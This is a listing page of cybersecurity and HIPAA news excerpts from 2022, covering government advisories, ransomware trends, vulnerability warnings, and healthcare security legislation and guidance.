CISA Adds 75 Vulnerabilities to the Known Exploited Vulnerability Catalog
May31

CISA Adds 75 Vulnerabilities to the Known Exploited Vulnerability Catalog

Last week, the Cybersecurity and Infrastructure Security Agency (CISA) added a further 75 vulnerabilities to its Known Exploited Vulnerability Catalog. The Known Exploited Vulnerability Catalog is a list of vulnerabilities in software and operating systems that are known to be exploited in real-world attacks. The list now includes 737 vulnerabilities. The latest additions came in three batches that were added on Tuesday (21), Wednesday (20), and Thursday (34). Under Binding Operational Directive (BOD) 22-01, all Federal Civilian Executive Branch (FCEB) agencies are required to scan for the vulnerabilities and ensure patches are applied or the vulnerabilities are otherwise mitigated within two weeks. The majority of the vulnerabilities added to the list last week are not new flaws. In most cases, patches were released to address the laws several years ago and in some cases, the vulnerabilities were publicly disclosed 12 years ago. Some of the vulnerabilities affect products that have long since passed end-of-life, such as Adobe Flash Player, Virtual System/Server Administrator...

Read More
What is CMMC Compliance?
May30

What is CMMC Compliance?

Following a recent review of the Cybersecurity Maturity Model Certification (CMMC) framework, the requirements for CMMC compliance have changed considerably. This blog discusses the reasons for the change, what it means for companies in the Defense Industrial Base, and what prime contractors and subcontractors now have to do to become CMMC 2.0 compliant. The history of government procurement goes back to the 18th Century and is – some claim – enshrined in Article 6 of the U.S. Constitution. Over the years, as the number of government agencies grew, each agency developed its own acquisition guidelines – making it complicated for suppliers and contractors in the private sector to do business with different government agencies. To resolve the complexity of supplying goods and services to different government agencies, the Federal Acquisition Regulation was introduced in 1984 (PDF) to “provide for coordination, simplicity, and uniformity in the Federal acquisition process”. However, supplying goods and services to government agencies has continued to be complicated due to...

Read More
Study Identifies Risks Associated with 3rd and 4th Party Scripts on Websites
May27

Study Identifies Risks Associated with 3rd and 4th Party Scripts on Websites

A recent study by Source Defense examined the risks associated with the use of third- and fourth-party code on websites and found that all modern, dynamic websites included code that could be targeted by hackers to gain access to sensitive data. SOurce Defense explained that websites typically have their own third-party supply chains, with those third parties providing a range of services and functions related to site performance, tracking and analytics, and improving conversion rates to generate more sales. The inclusion of third- and fourth-party code on websites also introduces security and compliance risks. On the compliance side, tracking code has the potential to violate data privacy laws such as the EU’s General Data Protection Regulation (GDPR) and from a security perspective, the code included on websites may have vulnerabilities that can be exploited by threat actors to gain access to sensitive data, including protected health information. To explore the risks associated with third- and fourth-party code, Source Defense scanned the top 4,300 websites based on traffic and...

Read More
Former IT Consultant Charged with Intentionally Causing Damage to Healthcare Company’s Server
May27

Former IT Consultant Charged with Intentionally Causing Damage to Healthcare Company’s Server

An information technology consultant who worked as a contractor at a suburban healthcare company in Chicago has been charged with illegally accessing the company’s network and intentionally causing damage to a protected computer. Aaron Lockner, 35, of Downers Grove, IL, worked for an IT company that had a contract with a healthcare company to provide security and technology services. Lockner was provided with access to the network of the healthcare provider’s clinic in Oak Lawn, IL, to perform the contracted IT services. In February 2018, Lockner applied for an employment position with the healthcare provider, but his application was denied. Lockner was then terminated from the IT firm in March 2018. A month later, on or around April 16, 2018, Lockner is alleged to have remotely accessed the computer network of the healthcare company without authorization. According to the indictment, Lockner knowingly caused the transmission of a program, information, code, and command, and as a result of his actions, intentionally caused damage to a protected computer. The computer intrusion...

Read More
Verizon Data Breach Investigations Report Reveals 2021 Data Breach Trends
May25

Verizon Data Breach Investigations Report Reveals 2021 Data Breach Trends

For the past 15 years, Verizon has been publishing annual Data Breach Investigation Reports (DBIR), with this year’s report confirming just how bad the past 12 months have been. Verizon described the past 12 months as representing an unprecedented year in cybersecurity history. “From very well-publicized critical infrastructure attacks to massive supply chain breaches, the financially motivated criminals and nefarious nation-state actors have rarely, if ever, come out swinging the way they did over the last 12 months,” explained Verizon. The 2022 DBIR was compiled in conjunction with 87 partner organizations using data from 23,896 security incidents, of which 5,212 were confirmed data breaches, 849 of the security incidents analyzed in the report occurred in the healthcare sector, with 571 of those incidents resulting in confirmed data breaches. The report confirms there was a major increase in ransomware attacks in 2021, increasing 13% from the previous year. To add some perspective, the increase is greater than the combined increases over the previous five years. As Verizon...

Read More
HHS Shares Information on Advanced Persistent Threat Groups Linked with the Russian Intelligence Services
May23

HHS Shares Information on Advanced Persistent Threat Groups Linked with the Russian Intelligence Services

The U.S. Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center (HC3) has issued a threat brief providing information on the cyber organizations of the Russian Intelligence Services which pose a threat to organizations in the United States, including the healthcare and public health (HPH) sector. The threat brief provides information on four key advanced persistent threat actors which conduct offensive cyber activities and espionage within the Russian Intelligence Services. These APT actors have been linked to the Federal Security Service (FSB), the Foreign Intelligence Service (SVR), and the Main Intelligence Directorate of the General Staff of the Armed Forces (GRU). The FSB is equivalent to the Federal Bureau of Investigation in the U.S and is mostly concerned with domestic intelligence and foreign intelligence from Russia’s near abroad. The SVR is equivalent to the U.S. Central Intelligence Agency (CIA) and collects foreign intelligence from military, strategic, economic, scientific, and technological targets. The GRU is the equivalent of...

Read More
CISA Issues Emergency Directive to Patch Vulnerable VMWare Products
May20

CISA Issues Emergency Directive to Patch Vulnerable VMWare Products

An emergency directive has been issued by the Cybersecurity and Infrastructure Security Agency (CISA) to all federal agencies, requiring them to take steps to address two vulnerabilities in certain VMware products that are likely to be rapidly exploited in the wild, and two previous vulnerabilities in VMWare products that were disclosed in April which are being exploited by multiple threat actors, including Advanced Persistent Threat (APT) actors. The latest vulnerabilities, tracked as CVE-2022-22972 (critical) and CVE-2022-22973 (high severity), and the two vulnerabilities from April affect 5 VMWare products: VMware Workspace ONE Access (Access) Appliance VMware Identity Manager (vIDM) Appliance VMware vRealize Automation (vRA) VMware Cloud Foundation vRealize Suite Lifecycle Manager CVE-2022-22972 is an authentication bypass vulnerability affecting VMware Workspace ONE Access, Identity Manager, and vRealize Automation that affects local domain users. If a malicious actor has network access to the UI, the flaw can be exploited to gain administrative access without authentication....

Read More
Cybersecurity Agencies Share Most Common Attack Vectors for Initial Access and Recommended Mitigations
May18

Cybersecurity Agencies Share Most Common Attack Vectors for Initial Access and Recommended Mitigations

According to a recent security advisory issued by the Five Eyes Cybersecurity agencies in the US, UK, Canada, Australia, and New Zealand, the most common attack vectors used by cyber threat actors for initial access to networks are exploits of public-facing applications, external remote services, trusted relationships, phishing, and compromised credentials for valid user accounts. These attack methods often succeed due to poor security practices, bad cyber hygiene, weak controls, and poor security configurations. The security advisory details the most commonly exploited controls and practices and provides recommendations for mitigations to strengthen security and block these attack vectors. Top 10 Security Weaknesses Exploited by Hackers The top ten security weaknesses exploited by hackers consist of poor security practices, weak security controls, and misconfigurations and unsecured systems, which allow the most common attack vectors to be used. Slow software updates and patching The failure to update software promptly and apply patches for known vulnerabilities gives attackers a...

Read More
Five Eyes Intelligence Alliance Warns of Increase in Cyberattacks Targeting Managed Service Providers
May13

Five Eyes Intelligence Alliance Warns of Increase in Cyberattacks Targeting Managed Service Providers

The Five Eyes intelligence alliance, which consists of cybersecurity agencies from the United States, United Kingdom, Australia, New Zealand, and Canada, has issued a joint alert warning about the increasing number of cyberattacks targeting managed service providers (MSPs). MSPs are attractive targets for cybercriminals and nation-state threat actors. Many businesses rely on MSPs to provide information and communication technology (ICT) and IT infrastructure services, as it is often easier and more cost-effective than developing the capabilities to handle those functions internally. In order to provide those services, MSPs require trusted connectivity and privileged access to the networks of their clients. Cyber threat actors target vulnerable MSPs and use them as the initial access vector to gain access to the networks of all businesses and organizations that they support. It is far easier to conduct a cyberattack on a vulnerable MSP and gain access to the networks of dozens of businesses than to target those businesses directly. When MSP systems are compromised, it may take...

Read More
Bill Introduced that Seeks to Improve Medical Device Cybersecurity
May11

Bill Introduced that Seeks to Improve Medical Device Cybersecurity

A new bill has been introduced that seeks to address the cybersecurity of medical devices that will require manufacturers of medical devices to meet certain minimum standards for cybersecurity for the entire lifecycle of the products. The medical device cybersecurity provisions of the bill – H.R. 7667 Food and Drug Amendments of 2022 – call for device manufacturers to “have a plan to appropriately monitor, identify, and address in a reasonable time postmarket cybersecurity vulnerabilities and exploits, including coordinated vulnerability disclosure and procedures,” and to “design, develop, and maintain processes and procedures to ensure the device and related systems are cybersecure.” The processes and procedures should include making “updates and patches available to the cyber device and related systems throughout the lifecycle of the cyber device.” Those patches and updates are required on a reasonably justified regular cycle to address known vulnerabilities, and, as soon as possible out of cycle, to address critical vulnerabilities that could cause uncontrolled...

Read More
HC3 Highlights Trends in Ransomware Attacks on the HPH Sector
May10

HC3 Highlights Trends in Ransomware Attacks on the HPH Sector

The tactics, techniques, and procedures (TTPs) used by ransomware and other cyber threat actors are constantly evolving to evade detection and allow the groups to conduct more successful attacks. The TTPs employed in the first quarter of 2022 by ransomware gangs have been analyzed and shared by the Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center (HC3). In Q1, 2022, the majority of ransomware attacks on the Healthcare and Public Health Sector (HPH) were conducted by five ransomware-as-a-service groups. LockBit 2.0 and Conti each accounted for 31% of attacks, followed by SunCrypt (16%), ALPHV/BlackCat (11%), and Hive (11%). The financially motivated threat groups FIN7 and FIN12 have also shifted their activities and have moved to ransomware operations, with FIN7 working with ALPHV and FIN12 extensively involved in attacks on the HPH sector. FIN12’s involvement has decreased the timescale for conducting attacks from 5 days to 2 days. Ransomware gangs often work with initial access brokers (IABs) that specialize in gaining access to...

Read More
NIST Publishes Updated Cybersecurity Supply Chain Risk Management Guidance
May06

NIST Publishes Updated Cybersecurity Supply Chain Risk Management Guidance

On Thursday, the National Institute of Standards and Technology (NIST) published updated cybersecurity supply chain risk management (C-SCRM) guidance to help organizations develop an effective program for identifying, assessing, and responding to cybersecurity risks throughout the supply chain. Cyber threat actors are increasingly targeting the supply chain. A successful attack on a single supplier can allow the threat actor to compromise the networks of all companies that use the product or service, as was the case with the REvil ransomware attack on Kaseya in 2021. The threat actors exploited a vulnerability in Kaseya VSA software and the attack affected up to 1,500 businesses. The publication, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (NIST Special Publication 800-161 Revision 1), is the result of a multiyear process that included the release of two draft versions of the guidance. The updated guidance can be used to identify, assess, and respond to cybersecurity risks throughout the supply chain at all levels of an organization. While...

Read More
Average Ransom Payment Dropped by 34% in Q1, 2022
May05

Average Ransom Payment Dropped by 34% in Q1, 2022

The average ransom payment in ransomware attacks fell by 34% in Q1, 2022, from an all-time high in Q4, 2021, according to ransomware incident response firm Coveware. The average ransom payment in Q1, 2022 was $211,259 and the median ransom payment was $73,906. The fall in total ransom payments has been attributed to several factors. Coveware suggests ransomware gangs have been targeting smaller organizations and issuing lower ransom demands, due to the increased scrutiny by law enforcement when attacks are conducted on large enterprises. The median company size has been falling since Q4, 2020, and is now companies with around 160 employees. This appears to be the sweet spot, where the companies have sufficient revenues to allow sizable ransoms to be paid, but not so large that attacks will result in considerable scrutiny by law enforcement. Another reason why total ransom payments have fallen is fewer victims of ransomware attacks have been paying the ransom. The number of victims of ransomware attacks that pay the ransom has been steadily declining, from 85% of victims in Q1 2019...

Read More
FBI Issues Warning About BEC Scams as Losses Increase to $43 Billion
May05

FBI Issues Warning About BEC Scams as Losses Increase to $43 Billion

The Federal Bureau of Investigation (FBI) has issued a public service announcement warning about the threat of Business Email Compromise/Email Account Compromise (BEC/EAC) scams. The number of attacks reported to the FBI Internet Crime Complaint Center (IC3) and the amount of money lost to these scams continues to grow each year, with losses to BEC/EAC scams increasing 65% between July 2019 and December 2021. BEC/EAC scams are the leading cause of losses to cybercrime. Between June 2016 and December 2021, IC3 received 241,206 complaints about domestic and international BEC/EAC attacks with reported losses of more than $43.3 billion. The IC3 2021 Internet Crime Report shows victims reported losses of $2.4 billion in 2021 across 19,954 complaints – around one-third of all losses to cybercrime in 2021. The actual losses to these scams are undoubtedly far higher, as many victims do not report the scams to the FBI, especially if the losses are relatively small. BEC/EAC scams involve compromising email accounts and using them to send emails to businesses and individuals who perform...

Read More
HHS Information Security Program Rated ‘Not Effective’
May04

HHS Information Security Program Rated ‘Not Effective’

An audit of the Department of Health and Human Services conducted for the HHS’ Office of Inspector General (OIG) to assess compliance with the Federal Information Security Modernization Act of 2014 (FISMA) in the fiscal year 2021 has seen the agency’s information security program rated ‘not effective’, as was the case in fiscal years 2018, 2019, and 2020. The audit was conducted at five of the 12 operating divisions of the HHS, although OIG did not state which five divisions were audited. In order to receive an effective rating, the HHS is required to reach the ‘Managed and Measurable’ maturity level for the Identify, Protect, Detect, Respond, and Recover function areas, as required by DHS guidance and the FY 2021 Inspector General FISMA Reporting Metrics. OIG said in the report that the HHS has continued to make changes to strengthen the maturity of its enterprise-wide cybersecurity program and is making progress to sustain cybersecurity across all FISMA domains. The HHS security program strengthened the maturity of controls for several individual FISMA metrics,...

Read More
Operational Continuity-Cyber Incident Checklist Published by HSCC
May03

Operational Continuity-Cyber Incident Checklist Published by HSCC

The Health Sector Coordinating Council’s (HSCC) Cybersecurity Working Group (CWG) has published an Operational Continuity-Cyber Incident (OCCI) checklist which serves as a flexible template for responding to and recovering from serious cyberattacks that cause extended system outages, such as ransomware attacks. Ransomware attacks on healthcare organizations increased significantly during the pandemic and continue to be conducted at elevated levels. Ransomware threat actors steal sensitive data that has a high value on the black market, threaten to publish that data to pressure visitors into paying, and the extended system outages due to the attacks can cause considerable financial losses, increasing the probability of the ransom being paid. Warnings have recently been issued by the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) about ransomware groups that are actively targeting critical infrastructure, including healthcare organizations. In addition to cybercriminal groups, hospitals are a target for nation-state threat...

Read More
WEDI Makes Healthcare-Specific Recommendations for Improving the NIST Cybersecurity Framework
Apr29

WEDI Makes Healthcare-Specific Recommendations for Improving the NIST Cybersecurity Framework

The Workgroup for Electronic Data Interchange (WEDI) has responded to the request for information from the National Institute of Standards and Technology (NIST) and has made several recommendations for improving the NIST cybersecurity framework and supply chain risk management guidance to help healthcare organizations deal with some of the most pressing threats facing the sector. Ransomware is one of the main threats facing the healthcare industry, and that is unlikely to change in the short to medium term.  To help healthcare organizations deal with the threat, WEDI has suggested NIST increase its focus on ransomware and address the issue of ransomware directly in the cybersecurity framework. NIST published a new ransomware resource in February 2022, which contains valuable information on protecting against, detecting, responding to, and recovering from ransomware attacks. WEDI feels the inclusion of ransomware within the cybersecurity framework will expand the reach and impact of the resource. WEDI has also recommended the inclusion of specific case studies of healthcare...

Read More
15 Most Exploited Vulnerabilities in 2021
Apr29

15 Most Exploited Vulnerabilities in 2021

The Five Eyes security agencies, an alliance of intelligence agencies from Australia, Canada, New Zealand, the United Kingdom, and the United States, have issued a joint advisory about the 15 vulnerabilities in software and operating systems that were most commonly targeted by nation-state hackers and cybercriminal organizations in 2021. Throughout 2021, malicious cyber actors targeted newly disclosed critical software vulnerabilities in attacks against a wide range of industry sectors, including public and private sector organizations. 11 of the most routinely targeted vulnerabilities were publicly disclosed in 2021, although older vulnerabilities continue to be exploited. The 15 most exploited vulnerabilities include 9 that allow remote code execution, 2 elevation of privilege flaws, and security bypass, path traversal, arbitrary file reading, and arbitrary code execution flaws. Top of the list was the maximum severity Log4Shell vulnerability in the Apache Log4j open source logging framework. The vulnerability – CVE-2021-44228 – can be remotely exploited by a threat actor...

Read More
Five Eyes Agencies Warn Critical Infrastructure Orgs About Threat of Russian State-Sponsored and Criminal Cyberattacks
Apr27

Five Eyes Agencies Warn Critical Infrastructure Orgs About Threat of Russian State-Sponsored and Criminal Cyberattacks

The five eyes cybersecurity agencies have recently issued a joint security alert warning about the threat of cyberattacks on critical infrastructure by Russian nation-state threat actors and pro-Russia cybercriminal groups. Intelligence gathered by the agencies indicates the Russian government has been exploring opportunities for conducting cyberattacks against targets in the West in retaliation for the sanctions imposed on Russia and the support being provided to Ukraine. The agencies warn that Russian state-sponsored hacking groups have been conducting Distributed Denial of Service (DDoS) attacks in Ukraine and are known to have used destructive malware in Ukraine on government and critical infrastructure organizations. These hacking groups are highly skilled, can gain access to IT networks, maintain persistence, exfiltrate sensitive data, and can cause major disruption to critical systems, including industrial control systems. The alert names several Russian government and military organizations that have engaged in these malicious activities, including the Russian Federal...

Read More
2021 Saw Record Numbers of DDoS Attacks on the Healthcare Industry
Apr22

2021 Saw Record Numbers of DDoS Attacks on the Healthcare Industry

A new report from Comcast Business indicates 2021 was another record-breaking year for Distributed Denial of Service (DDoS) attacks. 9.84 million DDoS attacks were reported in 2021, which is a 14% increase from 2019, although slightly lower than the previous year when 10.1 million attacks were reported. The slight decline in attacks was due to several factors. 2020 was a particularly bad year as it was a full lockdown year where employees were working remotely and students were learning from home, which provided attackers with a unique landscape against which to launch an unprecedented number of DDoS attacks, and the high prices of cryptocurrencies in 2021 meant many threat actors diverted their botnets from conducting DDoS attacks to mining cryptocurrencies. DDoS attackers spared no one in 2021; however, 73% of attacks were conducted on just four sectors – healthcare, government, finance, and education. Attackers followed seasonal trends and activities throughout the year, with education being attacked to coincide with the school year, and COVID-19 and vaccine availability drove...

Read More
FBI Issues Warning About BlackCat Ransomware Operation
Apr21

FBI Issues Warning About BlackCat Ransomware Operation

The Federal Bureau of Investigation (FBI) has issued a TLP: WHITE flash alert about the BlackCat ransomware-as-a-service (RaaS) operation. BlackCat, also known as ALPHAV, was launched in November 2021. It was launched shortly after the shutdown of the BlackMatter ransomware operation, which was a rebrand of DarkSide.  Darkside was behind the ransomware attack on the Colonial Pipeline. A member of the operation has claimed they are a former affiliate of BlackMatter/DarkSide that branched out on their own. However, it is more likely that BlackCat is simply a rebrand of BlackMatter/DarkSide. The FBI said many of the developers and money launderers involved with the BlackCat operation have been linked to DarkSide/BlackMatter, which indicates they have extensive networks and considerable experience with running RaaS operations. The BlackCat RaaS operation has not been active for long, but the group has already claimed at least 60 victims worldwide. BlackCat typically targets large organizations and demands ransom payments of several million dollars in Bitcoin or Monero, although the...

Read More
HHS Issues Warning to HPH Sector about Hive Ransomware
Apr20

HHS Issues Warning to HPH Sector about Hive Ransomware

The HHS’ Office of Information Security Health Sector Cybersecurity Coordination Center (HC3) has issued a TLP: White alert about the Hive ransomware group – A particularly aggressive cybercriminal operation that has extensively targeted the healthcare sector in the United States. HC3 has shared an analysis of the tactics, techniques, and procedures (TTPs) known to be used by the group in their attacks and has shared cybersecurity principles and mitigations that can be adopted to improve resilience against Hive ransomware attacks. The Hive ransomware group has been conducting attacks since at least June 2021. The group is known for using double extortion tactics, where sensitive data is exfiltrated prior to file encryption and threats are issued to publish the data if the ransom is not paid. The group is also known to contact victims by phone to pressure them into paying the ransom. Hive is a ransomware-a-service (RaaS) operation where affiliates are recruited to conduct attacks on the gang’s behalf in exchange for a cut of the profits that are generated, which allows the core...

Read More
What is a HIPAA Violation?
Apr18

What is a HIPAA Violation?

To best answer the question what is a HIPAA violation, it is necessary to explain what HIPAA is, who it applies to, and what constitutes a violation; for although most people believe they know what a HIPAA violation is, evidence suggests otherwise. The evidence that there may be a misunderstanding about what a HIPAA violation is comes from the Department of Health and Human Services (HHS) Enforcement Highlights web page. The web page is regularly updated with statistics relating to complaints about HIPAA violations, compliance reviews, and enforcement action. According to the most recent update, the HHS has received almost 300,000 complaints since the compliance date of the Privacy Rule (April 2003). On its behalf, the Office for Civil Rights (OCR) has conducted tens of thousands of compliance reviews or intervened with technical assistance before a review was necessary. However, in more than 200,000 cases, complaints received by HHS have not been reviewed by OCR for reasons such as the entity alleged to have violated HIPAA was not a HIPAA Covered Entity, or the alleged activity...

Read More
Microsoft Sinkholes Notorious ZLoader Botnet
Apr15

Microsoft Sinkholes Notorious ZLoader Botnet

The notorious ZLoader cybercrime botnet, which was used to deliver Ryuk ransomware in attacks on healthcare providers, has been disabled by Microsoft’s Digital Crimes Unit (DCU). Microsoft recently obtained a court order from the United States District Court for the Northern District of Georgia authorizing the seizure of 65 hard-coded domains used by the ZLoader botnet for command-and-control communications. Those domains have now been sinkholed, preventing the operator of the botnet from communicating with devices infected with ZLoader malware. ZLoader malware included a domain generation algorithm (DGA) which is triggered if communication with the hard-coded domains is not possible, which serves as a failsafe against any takedown efforts. The court order also allowed Microsoft to seize 319 DGA-registered domains. Microsoft is working to block the registration of any future DGA domains. ZLoader is part of a family of malware variants that descended from the ZeuS banking Trojan. Initially, ZeuS was used for credential and financial theft, with the aim of transferring money out of...

Read More
JekyllBot:5 Vulnerabilities Allow Hackers to Take Control of Aethon TUG Hospital Robots
Apr14

JekyllBot:5 Vulnerabilities Allow Hackers to Take Control of Aethon TUG Hospital Robots

Five zero-day vulnerabilities have been identified in Aethon TUG autonomous mobile robots, which are used in hospitals worldwide for transporting goods, medicines, and other medical supplies. Hospital robots are attractive targets for hackers. If access to the robots is gained, a variety of malicious actions could be performed. Attackers could trigger a denial-of-service condition to disrupt hospital operations for extortion, and since sensitive patient data is fed into the devices, exploitation of the vulnerabilities could provide hackers with access to patient data. The robots are given privileged access to restricted areas within healthcare facilities, which would not normally be accessible to unauthorized individuals. The robots can open doors and access elevators, and could be used to block access, shut down elevators, or bump into staff and patients. Since the robots have integrated cameras, they could be hijacked and used for surveillance. The robots could also potentially be hijacked and used to deliver malware or could serve as a launchpad for more extensive cyberattacks...

Read More
Warning Issued About Phishing Campaigns Involving Legitimate Email Marketing Platforms
Apr12

Warning Issued About Phishing Campaigns Involving Legitimate Email Marketing Platforms

A recent data breach at the email marketing platform vendor Mailchimp has prompted a warning from the Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center (HC3) about the risk of phishing attacks using the platform. The breach came to light when the cryptocurrency hardware wallet provider, Trezor, investigated a phishing campaign targeting its customers that used the email addresses registered to Trezor accounts, which uncovered a data breach at Mailchimp. Mailchimp’s investigation confirmed that threat actors had successfully compromised internal accounts of its customer support and account administration teams, and while those accounts have now been secured, the attackers were able to gain access to the accounts of 300 Mailchimp users and were able to extract audience data from 102 of those accounts. API keys were also obtained by the attackers that allow them to create email campaigns for use in phishing attacks without having to access customer portals. Since accounts used by Mailchimp customers to send marketing campaigns such as...

Read More
Increase in Class Action Lawsuits Following Healthcare Data Incidents
Apr12

Increase in Class Action Lawsuits Following Healthcare Data Incidents

The law firm BakerHostetler has published its 8th Annual Data Security Incident Response (DSIR) Report, which provides insights based on 1,270 data security incidents managed by the firm in 2021. 23% of those incidents involved data security incidents at healthcare organizations, which was the most targeted sector and resulted in cases of HIPAA violations. Ransomware Attacks Increased in 2021 Ransomware attacks have continued to occur at elevated levels, with them accounting for 37% of all data security incidents handled by the firm in 2021, compared to 27% in 2020 and there are no signs that attacks will decrease in 2022. Attacks on healthcare organizations increased considerably year over year. 35% of healthcare security incidents handled by BakerHostetler in 2021 involved ransomware, up from 20% in 2022. Ransom demands and payments decreased in 2021. In healthcare, the average initial ransom demand was $8,329,520 (median $1,043,480) and the average ransom paid was $875,784 (median $500,846) which is around two-thirds of the amount paid in 2020. Restoration of files took an...

Read More
HIPAA Social Media Rules
Apr12

HIPAA Social Media Rules

HIPAA was enacted several years before social media networks such as Facebook and Instagram were launched, so there are no specific HIPAA social media rules. However, as with all healthcare-related communications, the HIPAA Privacy Rule still applies whenever covered entities or business associates – or employees of either – use social media networks. There are many benefits to be gained from using social media. Social media networks allow healthcare organizations to interact with patients and get them more involved in their own healthcare. Healthcare organizations can quickly and easily communicate important messages or provide information about new services. Healthcare providers can attract new patients via social media networks. However, there is also considerable potential for HIPAA rules and patient privacy to be violated on social media networks. So how can healthcare organizations and their employees use social media without violating HIPAA Rules? HIPAA and Social Media Healthcare organizations must implement a HIPAA social media policy to reduce the risk of...

Read More
FDA Releases Updated Guidance on Medical Device Cybersecurity
Apr11

FDA Releases Updated Guidance on Medical Device Cybersecurity

The U.S. Food and Drug Administration (FDA) has issued new draft guidance for medical device manufacturers to help them incorporate cybersecurity protections into their products at the premarket stage, and to ensure security risks are managed for the full life cycle of the products. The FDA first released final guidance on premarket expectations for medical devices in 2014, then updated and released draft guidance in 2018. The latest update was deemed necessary due to the changing threat landscape, the increasing use of wireless, Internet- and network-connected devices, portable media, and the frequent electronic exchange of medical device-related health information. Further, the healthcare industry is being increasingly targeted by cyber threat actors, and the severity and clinical impact of healthcare cyberattacks have increased. Cyberattacks on healthcare providers have the potential to delay test results, diagnoses, and treatment, which could lead to patient harm. The FDA felt that an updated approach was necessary to ensure cybersecurity risks were managed and reduced to a low...

Read More
NCCoE Releases Final Guidance on Effective Enterprise Patch Management
Apr07

NCCoE Releases Final Guidance on Effective Enterprise Patch Management

The National Cybersecurity Center of Excellence (NCCoE) has released the final versions of two Special Publications that provide guidance on enterprise patch management practices to prevent the exploitation of vulnerabilities in IT systems. Cybercriminals and nation-state threat actors target unpatched vulnerabilities in software, operating systems, and firmware to gain access to business networks to steal sensitive data and disrupt operations. It is vital for all organizations to ensure patches and software/firmware updates are implemented promptly to prevent exploitation. “Patching is a critical component of preventive maintenance for computing technologies—a cost of doing business, and a necessary part of what organizations need to do in order to achieve their missions,” explained NCCoE. “It helps prevent compromises, data breaches, operational disruptions, and other adverse events.” While the importance of prompt patching is well understood by IT, security, and technology management, the importance and value of patching is typically less well understood by organizations’...

Read More
OCR Seeks Comment on Recognized Security Practices and the Sharing of HIPAA Settlements with Harmed Individuals
Apr07

OCR Seeks Comment on Recognized Security Practices and the Sharing of HIPAA Settlements with Harmed Individuals

The Department of Health and Human Services’ Office for Civil Rights has released a Request for information (RFI) related to two outstanding requirements of the Health Information Technology for Economic and Clinical Health Act of 2009 (HITECH Act). The HITECH Act, as amended in 2021 by the HIPAA Safe Harbor Act, requires the HHS consider the security practices that have been implemented by HIPAA-regulated entities when considering financial penalties and other remedies to resolve potential HIPAA violations discovered during investigations and audits. The aim of the HIPAA Safe Harbor Act is to encourage HIPAA-regulated entities to implement cybersecurity best practices. The reward for organisations that have followed industry-standard security best practices for the 12 months prior to a data breach occurring is lower financial penalties for data breaches and less scrutiny by the HHS . Another outstanding requirement that dates back to when the HITECH Act was signed into law, is for the HHS to share a percentage of the civil monetary penalties (CMPs) and settlement payments...

Read More
The Protecting and Transforming Cyber Health Care (PATCH) Act Introduced to Improve Medical Device Cybersecurity
Apr05

The Protecting and Transforming Cyber Health Care (PATCH) Act Introduced to Improve Medical Device Cybersecurity

A bipartisan pair of senators have introduced the Protecting and Transforming Cyber Health Care (PATCH) Act which aims to improve the security of medical devices. Vulnerabilities are often identified in medical devices that could potentially be exploited by threat actors to change the functionality of the devices, render them inoperable, or to allows the devices to be used as a springboard for more extensive attacks on healthcare networks. Over the course of the pandemic, cyberattacks on healthcare organizations have increased, and medical devices and the networks to which they connect have been affected by ransomware attacks. These attacks have affected hospitals, patients, and the medical device industry. U.S. Senators Bill Cassidy, M.D. (R-LA) and Tammy Baldwin (D-WI) introduced the PATCH Act to ensure that the U.S. healthcare system’s cyber infrastructure remains safe and secure. The PATCH Act will update the Federal Food, Drug, and Cosmetic Act to require all premarket submissions for medical devices to include details of the cybersecurity protections that have been...

Read More
Differences Between Small and Large Healthcare Organizations on Security
Apr04

Differences Between Small and Large Healthcare Organizations on Security

A recent survey of healthcare providers by Software Advice provides insights into healthcare data breaches, their root causes, and the different security practices at small and large healthcare providers. The survey was conducted on 130 small practices with 5 or fewer licensed providers and 129 large practices with six or more providers to understand the security issues they face and the measures each group has taken to protect against cyberattacks and data breaches. Across both groups of healthcare providers, more than half store more than 90% of patient data digitally, such as patient records, medical histories, and billing records. While digital records are more efficient, there is a risk that hackers will be able to gain access to patient information. Hackers tend to target larger practices rather than small practices, based on the number of reported data breaches. 48% of large healthcare providers said they had experienced a data breach in the past, and 16% said they had suffered a breach in the past 12 months. One in four small practices had experienced a breach in the past...

Read More
What is the Relationship Between HITECH, HIPAA, and Electronic Health and Medical Records?
Apr02

What is the Relationship Between HITECH, HIPAA, and Electronic Health and Medical Records?

The Health Insurance Portability and Accountability Act (HIPAA) was signed into law in August 1996 and led to the development of the HIPAA Privacy Rule in 2003 and the HIPAA Security Rule in 2005, but how did the Health Information Technology for Economic and Clinical Health (HITECH) Act change HIPAA and what is the relationship between HITECH, HIPAA, and electronic health and medical records? What is the Relationship Between HITECH and HIPAA and Medical Records? There is a strong relationship between HITECH and HIPAA as Title II of HIPAA includes the administrative simplification provisions that led to the development of the Privacy and Security Rules, while one of the main aims of the HITECH Act was to encourage the adoption of electronic health and medical records by creating financial incentives for making the transition from paper to digital records. In order to enable the increased adoption of electronic health and medical records and keep the data maintained in these devices secure, the HITECH Act strengthened the HIPAA Privacy and Security Rules, required Business...

Read More
Warnings Issued About Vulnerabilities in the Spring Application Building Platform and UPS Devices
Apr01

Warnings Issued About Vulnerabilities in the Spring Application Building Platform and UPS Devices

Two remote code execution vulnerabilities have been identified in the Spring platform – a popular application framework that software developers use for rapidly building Java applications. Proof-of-concept exploits for both vulnerabilities are in the public domain and at least one of the vulnerabilities is being actively exploited. The first vulnerability – CVE-2022-22963 – affects Spring Cloud Function versions 3.1.6, 3.2.2, and older unsupported versions and is remotely exploitable in the default configuration while running a Spring Boot application that depends on Spring Cloud Function, such as when depending on packages such as spring-cloud-function-web and spring-cloud-starter-function-web. According to VMWare, which owns Spring, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression, which will allow remote code execution and access to local resources. The vulnerability was initially assigned a CVSS severity score of 5.4, but was later upgraded to critical. Proof-of-concept exploits for the vulnerability...

Read More
Bipartisan Bill Proposed to Strengthen Healthcare and Public Health Sector Cybersecurity
Mar28

Bipartisan Bill Proposed to Strengthen Healthcare and Public Health Sector Cybersecurity

